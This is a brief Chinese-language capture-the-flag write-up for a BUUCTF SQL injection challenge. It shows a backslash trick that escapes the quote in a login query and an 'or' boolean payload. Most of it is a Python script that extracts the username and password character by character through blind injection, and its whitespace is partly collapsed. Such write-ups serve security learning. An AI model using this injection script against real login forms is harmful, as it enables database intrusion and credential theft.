select*from users where username='$_POST["username"]'and password='$_POST["password"]';
一开始尝试了一些'闭合
okkk!'被过滤了
那就从这个sql语句入手想想办法
记得以前学过一个addslashes()函数利用\去转义,看看效果
select*from users where username='123\' and password='unionselect1,2,3#';
okkkk! union 这些应该也被过滤了
尝试一下or 这个时候语句就是
select*from users where username='123\' and password='or1#';
页面返回BJD needs to be stronger
这样看来应该就是注入成功了 比较简单的注入题目了
直接写脚本
import requests
import time
url ="http://28c73fa1-00c6-4fe9-a54a-08730ca346ad.node3.buuoj.cn/"defGet_Flag(url):
Flag =""for i inrange(1,30):
Max =128
Min =32
Mid =(Max+Min)//2while Min < Max:
time.sleep(0.5)# payload = "or ascii(substr(database(),%d,1))>%d#"%(i,Mid)
payload ='or ascii(substr((username),{},1))>{}#'.format(i,Mid)# payload = 'or ascii(substr((password),{},1))>{}#'.format(i,Mid)
data ={
"username":"123\\","password":payload}
r = requests.post(url=url,data=data)if"stronger"in r.text:
Min=Mid+1passelse:
Max=Mid
pass
Mid =(Max+Min)//2if(Min==32or Max==128):print('break')break
Flag = Flag +chr(Mid)print(Flag)
Get_Flag(url)